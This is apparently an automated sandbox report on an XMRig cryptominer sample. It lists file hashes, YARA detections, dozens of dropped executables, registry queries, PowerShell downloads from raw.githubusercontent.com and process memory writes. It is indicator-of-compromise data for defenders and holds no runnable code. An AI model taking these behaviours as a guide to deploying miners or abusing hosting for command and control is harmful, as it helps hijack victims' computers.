xmrig | efaf5c1d718740c81ac82df815dbdeb416409a8dc8dea6941f16948fa8a14a7c

Analysis

max time kernel
120s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
20-05-2024 19:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
Size

2.2MB
MD5

60dc283da01ea9bf6be9d4ae8c71ce1b
SHA1

276a4fba0dfcf06ee1355332a4b576a567238c1b
SHA256

efaf5c1d718740c81ac82df815dbdeb416409a8dc8dea6941f16948fa8a14a7c
SHA512

b3ad24fcf0fca556fac07ead869645e0a88d161ad019e89fd8f56a7026ffc8ecc8ab20ced15c288342b12a0b5bae12fc4ce73f8c81edfbea4c79c77ca2b69e47
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82g1Vr5s1PTWsuT9e:NABL

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 48 IoCs

miner

resource	yara_rule
behavioral2/memory/4160-11-0x00007FF6475A0000-0x00007FF647992000-memory.dmp	xmrig
behavioral2/memory/4868-519-0x00007FF73B990000-0x00007FF73BD82000-memory.dmp	xmrig
behavioral2/memory/2360-523-0x00007FF6E1950000-0x00007FF6E1D42000-memory.dmp	xmrig
behavioral2/memory/4988-530-0x00007FF79A020000-0x00007FF79A412000-memory.dmp	xmrig
behavioral2/memory/4784-545-0x00007FF612870000-0x00007FF612C62000-memory.dmp	xmrig
behavioral2/memory/4392-543-0x00007FF72AA10000-0x00007FF72AE02000-memory.dmp	xmrig
behavioral2/memory/2132-535-0x00007FF66AB40000-0x00007FF66AF32000-memory.dmp	xmrig
behavioral2/memory/2732-579-0x00007FF6658A0000-0x00007FF665C92000-memory.dmp	xmrig
behavioral2/memory/2340-589-0x00007FF73F9A0000-0x00007FF73FD92000-memory.dmp	xmrig
behavioral2/memory/4596-587-0x00007FF6552F0000-0x00007FF6556E2000-memory.dmp	xmrig
behavioral2/memory/1948-582-0x00007FF60B800000-0x00007FF60BBF2000-memory.dmp	xmrig
behavioral2/memory/4072-576-0x00007FF7A7780000-0x00007FF7A7B72000-memory.dmp	xmrig
behavioral2/memory/2368-575-0x00007FF7376B0000-0x00007FF737AA2000-memory.dmp	xmrig
behavioral2/memory/1564-569-0x00007FF712550000-0x00007FF712942000-memory.dmp	xmrig
behavioral2/memory/1520-568-0x00007FF7968A0000-0x00007FF796C92000-memory.dmp	xmrig
behavioral2/memory/3084-559-0x00007FF7AA650000-0x00007FF7AAA42000-memory.dmp	xmrig
behavioral2/memory/4732-550-0x00007FF744B00000-0x00007FF744EF2000-memory.dmp	xmrig
behavioral2/memory/3704-68-0x00007FF7401C0000-0x00007FF7405B2000-memory.dmp	xmrig
behavioral2/memory/2688-54-0x00007FF6B72C0000-0x00007FF6B76B2000-memory.dmp	xmrig
behavioral2/memory/4092-2745-0x00007FF76DAB0000-0x00007FF76DEA2000-memory.dmp	xmrig
behavioral2/memory/2024-2746-0x00007FF6D9470000-0x00007FF6D9862000-memory.dmp	xmrig
behavioral2/memory/432-2747-0x00007FF63E510000-0x00007FF63E902000-memory.dmp	xmrig
behavioral2/memory/4620-2748-0x00007FF715030000-0x00007FF715422000-memory.dmp	xmrig
behavioral2/memory/4716-2749-0x00007FF7EFC20000-0x00007FF7F0012000-memory.dmp	xmrig
behavioral2/memory/4160-2763-0x00007FF6475A0000-0x00007FF647992000-memory.dmp	xmrig
behavioral2/memory/4092-2765-0x00007FF76DAB0000-0x00007FF76DEA2000-memory.dmp	xmrig
behavioral2/memory/2024-2767-0x00007FF6D9470000-0x00007FF6D9862000-memory.dmp	xmrig
behavioral2/memory/432-2769-0x00007FF63E510000-0x00007FF63E902000-memory.dmp	xmrig
behavioral2/memory/2688-2773-0x00007FF6B72C0000-0x00007FF6B76B2000-memory.dmp	xmrig
behavioral2/memory/4620-2772-0x00007FF715030000-0x00007FF715422000-memory.dmp	xmrig
behavioral2/memory/2340-2784-0x00007FF73F9A0000-0x00007FF73FD92000-memory.dmp	xmrig
behavioral2/memory/2360-2789-0x00007FF6E1950000-0x00007FF6E1D42000-memory.dmp	xmrig
behavioral2/memory/4988-2788-0x00007FF79A020000-0x00007FF79A412000-memory.dmp	xmrig
behavioral2/memory/4596-2785-0x00007FF6552F0000-0x00007FF6556E2000-memory.dmp	xmrig
behavioral2/memory/4868-2781-0x00007FF73B990000-0x00007FF73BD82000-memory.dmp	xmrig
behavioral2/memory/1948-2780-0x00007FF60B800000-0x00007FF60BBF2000-memory.dmp	xmrig
behavioral2/memory/4716-2777-0x00007FF7EFC20000-0x00007FF7F0012000-memory.dmp	xmrig
behavioral2/memory/3704-2776-0x00007FF7401C0000-0x00007FF7405B2000-memory.dmp	xmrig
behavioral2/memory/4392-2810-0x00007FF72AA10000-0x00007FF72AE02000-memory.dmp	xmrig
behavioral2/memory/4732-2808-0x00007FF744B00000-0x00007FF744EF2000-memory.dmp	xmrig
behavioral2/memory/4784-2806-0x00007FF612870000-0x00007FF612C62000-memory.dmp	xmrig
behavioral2/memory/3084-2804-0x00007FF7AA650000-0x00007FF7AAA42000-memory.dmp	xmrig
behavioral2/memory/1520-2800-0x00007FF7968A0000-0x00007FF796C92000-memory.dmp	xmrig
behavioral2/memory/2368-2798-0x00007FF7376B0000-0x00007FF737AA2000-memory.dmp	xmrig
behavioral2/memory/4072-2795-0x00007FF7A7780000-0x00007FF7A7B72000-memory.dmp	xmrig
behavioral2/memory/2732-2793-0x00007FF6658A0000-0x00007FF665C92000-memory.dmp	xmrig
behavioral2/memory/1564-2802-0x00007FF712550000-0x00007FF712942000-memory.dmp	xmrig
behavioral2/memory/2132-2792-0x00007FF66AB40000-0x00007FF66AF32000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
10	2960	powershell.exe
12	2960	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2960	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4160	XWwvSGG.exe
4092	KHrsuJB.exe
2024	tuUwWpU.exe
4620	ZAEQlim.exe
432	nqnYKoB.exe
1948	TxeENWr.exe
2688	AZWAXSv.exe
4716	EDrNBqr.exe
3704	ujHNAfx.exe
4868	upvfNti.exe
4596	iMQSZZr.exe
2340	htjoLUX.exe
2360	iZRumrm.exe
4988	wVhPWmd.exe
2132	JgRVOeC.exe
4392	OBGAyLi.exe
4784	dllcwnb.exe
4732	AgZDtGI.exe
3084	cBdEmww.exe
1520	SrsDDZQ.exe
1564	XlGnCMP.exe
2368	WYYFuHS.exe
4072	NtqqSxZ.exe
2732	jDZLIzC.exe
3204	UcpLciP.exe
3584	etOEsSG.exe
1576	hHXqTDv.exe
1912	Eaivfua.exe
1088	reyHRkJ.exe
4216	ToStQrv.exe
3196	OPmFCfy.exe
1504	vBxajTp.exe
4112	MhOAYPJ.exe
5012	sMcwfeM.exe
4916	yuSgClb.exe
1920	ghrKqGa.exe
4928	DHqZyWD.exe
388	JGNerAu.exe
3164	hRgjFxs.exe
3664	lGmHGCP.exe
4260	teayzoh.exe
2280	xiVkAFr.exe
1696	rdUtpkJ.exe
3088	pbDDskB.exe
4012	caJuNpp.exe
3096	ckNGxrM.exe
4312	XveCUwK.exe
2972	wmLFYTn.exe
5100	xzmcSHA.exe
5044	aksMTnE.exe
3376	ORuOhde.exe
5132	hZjIJVM.exe
5168	XmHPfry.exe
5188	LgmJAAj.exe
5216	pbYCNid.exe
5244	QeiWDuU.exe
5272	ZiOwdbQ.exe
5300	rlZRHCY.exe
5328	FAvKXFm.exe
5356	iHttynl.exe
5380	WSQYlVi.exe
5412	DlFtHaZ.exe
5444	Opjlclw.exe
5468	ZPltvrf.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3148-0-0x00007FF769520000-0x00007FF769912000-memory.dmp	upx
behavioral2/files/0x000900000002351b-5.dat	upx
behavioral2/memory/4160-11-0x00007FF6475A0000-0x00007FF647992000-memory.dmp	upx
behavioral2/files/0x000800000002351e-15.dat	upx
behavioral2/files/0x0007000000023524-25.dat	upx
behavioral2/files/0x0007000000023523-32.dat	upx
behavioral2/files/0x0007000000023526-40.dat	upx
behavioral2/files/0x000700000002352a-53.dat	upx
behavioral2/files/0x0007000000023528-56.dat	upx
behavioral2/files/0x0007000000023527-55.dat	upx
behavioral2/files/0x000700000002352b-65.dat	upx
behavioral2/files/0x000700000002352c-79.dat	upx
behavioral2/files/0x000700000002352d-84.dat	upx
behavioral2/files/0x000700000002352f-94.dat	upx
behavioral2/files/0x0007000000023531-104.dat	upx
behavioral2/files/0x0007000000023534-121.dat	upx
behavioral2/files/0x0008000000023536-131.dat	upx
behavioral2/files/0x0007000000023539-141.dat	upx
behavioral2/files/0x000700000002353a-154.dat	upx
behavioral2/files/0x000700000002353c-164.dat	upx
behavioral2/files/0x000700000002353e-179.dat	upx
behavioral2/memory/4868-519-0x00007FF73B990000-0x00007FF73BD82000-memory.dmp	upx
behavioral2/memory/2360-523-0x00007FF6E1950000-0x00007FF6E1D42000-memory.dmp	upx
behavioral2/memory/4988-530-0x00007FF79A020000-0x00007FF79A412000-memory.dmp	upx
behavioral2/memory/4784-545-0x00007FF612870000-0x00007FF612C62000-memory.dmp	upx
behavioral2/memory/4392-543-0x00007FF72AA10000-0x00007FF72AE02000-memory.dmp	upx
behavioral2/memory/2132-535-0x00007FF66AB40000-0x00007FF66AF32000-memory.dmp	upx
behavioral2/memory/2732-579-0x00007FF6658A0000-0x00007FF665C92000-memory.dmp	upx
behavioral2/memory/2340-589-0x00007FF73F9A0000-0x00007FF73FD92000-memory.dmp	upx
behavioral2/memory/4596-587-0x00007FF6552F0000-0x00007FF6556E2000-memory.dmp	upx
behavioral2/memory/1948-582-0x00007FF60B800000-0x00007FF60BBF2000-memory.dmp	upx
behavioral2/memory/4072-576-0x00007FF7A7780000-0x00007FF7A7B72000-memory.dmp	upx
behavioral2/memory/2368-575-0x00007FF7376B0000-0x00007FF737AA2000-memory.dmp	upx
behavioral2/memory/1564-569-0x00007FF712550000-0x00007FF712942000-memory.dmp	upx
behavioral2/memory/1520-568-0x00007FF7968A0000-0x00007FF796C92000-memory.dmp	upx
behavioral2/memory/3084-559-0x00007FF7AA650000-0x00007FF7AAA42000-memory.dmp	upx
behavioral2/memory/4732-550-0x00007FF744B00000-0x00007FF744EF2000-memory.dmp	upx
behavioral2/files/0x0007000000023540-181.dat	upx
behavioral2/files/0x000700000002353f-176.dat	upx
behavioral2/files/0x000700000002353d-174.dat	upx
behavioral2/files/0x0008000000023535-169.dat	upx
behavioral2/files/0x000700000002353b-159.dat	upx
behavioral2/files/0x0007000000023538-144.dat	upx
behavioral2/files/0x0007000000023537-134.dat	upx
behavioral2/files/0x0007000000023533-124.dat	upx
behavioral2/files/0x0007000000023532-119.dat	upx
behavioral2/files/0x0007000000023530-99.dat	upx
behavioral2/files/0x000700000002352e-89.dat	upx
behavioral2/memory/3704-68-0x00007FF7401C0000-0x00007FF7405B2000-memory.dmp	upx
behavioral2/files/0x0007000000023529-63.dat	upx
behavioral2/memory/4716-62-0x00007FF7EFC20000-0x00007FF7F0012000-memory.dmp	upx
behavioral2/memory/2688-54-0x00007FF6B72C0000-0x00007FF6B76B2000-memory.dmp	upx
behavioral2/memory/4620-44-0x00007FF715030000-0x00007FF715422000-memory.dmp	upx
behavioral2/files/0x0007000000023525-52.dat	upx
behavioral2/memory/432-29-0x00007FF63E510000-0x00007FF63E902000-memory.dmp	upx
behavioral2/memory/2024-26-0x00007FF6D9470000-0x00007FF6D9862000-memory.dmp	upx
behavioral2/files/0x0007000000023522-20.dat	upx
behavioral2/memory/4092-18-0x00007FF76DAB0000-0x00007FF76DEA2000-memory.dmp	upx
behavioral2/memory/4092-2745-0x00007FF76DAB0000-0x00007FF76DEA2000-memory.dmp	upx
behavioral2/memory/2024-2746-0x00007FF6D9470000-0x00007FF6D9862000-memory.dmp	upx
behavioral2/memory/432-2747-0x00007FF63E510000-0x00007FF63E902000-memory.dmp	upx
behavioral2/memory/4620-2748-0x00007FF715030000-0x00007FF715422000-memory.dmp	upx
behavioral2/memory/4716-2749-0x00007FF7EFC20000-0x00007FF7F0012000-memory.dmp	upx
behavioral2/memory/4160-2763-0x00007FF6475A0000-0x00007FF647992000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
10	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\zYPwJsA.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\XiQoTRK.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\jdIxOaq.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\treDZdp.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\IYXjgea.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\ILMARFp.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\tlFzBgD.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\TuAuqxZ.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\WpDpQwU.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\fEeueZS.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\ixKKUQm.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\cDpBuvT.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\iipDQML.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\zIdXfnT.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\AUdgUeq.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\yWJKozg.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\bugAccX.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\asxcmGo.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\maywLWy.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\iHvsuoR.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\TYHeWvl.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\UzFSLEN.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\XkmsIMj.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\EQzNYvp.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\LPUuKWb.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\hTFRmbG.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\CqttsXV.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\ZkmtmUO.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\LiYTFTt.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\flKekos.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\teQXCIk.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\fsQdGJe.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\jRRSPIf.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\YTmMbWa.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\DtQwkJs.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\wMMiXWN.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\ZekoyLT.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\ToStQrv.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\AhjdxDG.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\dTcfVUC.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\ypRtbVV.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\NhShGfM.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\oIauFnY.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\IAZUiSz.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\Eaivfua.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\oEQjhan.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\yVQEtAn.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\IuiaFbv.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\ctEqiRi.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\rkSezOR.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\YUXNLlU.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\YnPkyAJ.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\FRDcNAs.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\diRuRHs.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\NGBHxqW.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\OAXWSMf.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\QcqlJZg.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\aoxziza.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\eARizgg.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\PBzLsGE.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\iSqxYmN.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\HRIKrwr.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\jkXZTvV.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
File created	C:\Windows\System\yuSgClb.exe	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
Token: SeDebugPrivilege	2960	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3148 wrote to memory of 2960	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	91
PID 3148 wrote to memory of 2960	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	91
PID 3148 wrote to memory of 4160	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	92
PID 3148 wrote to memory of 4160	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	92
PID 3148 wrote to memory of 4092	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	93
PID 3148 wrote to memory of 4092	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	93
PID 3148 wrote to memory of 2024	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	94
PID 3148 wrote to memory of 2024	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	94
PID 3148 wrote to memory of 4620	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	95
PID 3148 wrote to memory of 4620	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	95
PID 3148 wrote to memory of 432	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	96
PID 3148 wrote to memory of 432	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	96
PID 3148 wrote to memory of 1948	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	97
PID 3148 wrote to memory of 1948	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	97
PID 3148 wrote to memory of 2688	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	98
PID 3148 wrote to memory of 2688	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	98
PID 3148 wrote to memory of 4716	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	99
PID 3148 wrote to memory of 4716	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	99
PID 3148 wrote to memory of 3704	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	100
PID 3148 wrote to memory of 3704	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	100
PID 3148 wrote to memory of 4868	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	101
PID 3148 wrote to memory of 4868	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	101
PID 3148 wrote to memory of 4596	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	102
PID 3148 wrote to memory of 4596	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	102
PID 3148 wrote to memory of 2340	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	103
PID 3148 wrote to memory of 2340	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	103
PID 3148 wrote to memory of 2360	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	104
PID 3148 wrote to memory of 2360	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	104
PID 3148 wrote to memory of 4988	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	105
PID 3148 wrote to memory of 4988	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	105
PID 3148 wrote to memory of 2132	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	106
PID 3148 wrote to memory of 2132	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	106
PID 3148 wrote to memory of 4392	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	107
PID 3148 wrote to memory of 4392	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	107
PID 3148 wrote to memory of 4784	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	108
PID 3148 wrote to memory of 4784	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	108
PID 3148 wrote to memory of 4732	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	109
PID 3148 wrote to memory of 4732	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	109
PID 3148 wrote to memory of 3084	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	110
PID 3148 wrote to memory of 3084	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	110
PID 3148 wrote to memory of 1520	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	111
PID 3148 wrote to memory of 1520	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	111
PID 3148 wrote to memory of 1564	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	112
PID 3148 wrote to memory of 1564	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	112
PID 3148 wrote to memory of 2368	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	113
PID 3148 wrote to memory of 2368	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	113
PID 3148 wrote to memory of 4072	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	114
PID 3148 wrote to memory of 4072	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	114
PID 3148 wrote to memory of 2732	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	115
PID 3148 wrote to memory of 2732	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	115
PID 3148 wrote to memory of 3204	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	116
PID 3148 wrote to memory of 3204	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	116
PID 3148 wrote to memory of 3584	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	117
PID 3148 wrote to memory of 3584	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	117
PID 3148 wrote to memory of 1576	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	118
PID 3148 wrote to memory of 1576	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	118
PID 3148 wrote to memory of 1912	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	119
PID 3148 wrote to memory of 1912	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	119
PID 3148 wrote to memory of 1088	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	120
PID 3148 wrote to memory of 1088	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	120
PID 3148 wrote to memory of 4216	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	121
PID 3148 wrote to memory of 4216	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	121
PID 3148 wrote to memory of 3196	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	122
PID 3148 wrote to memory of 3196	3148	60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe	122

C:\Users\Admin\AppData\Local\Temp\60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe
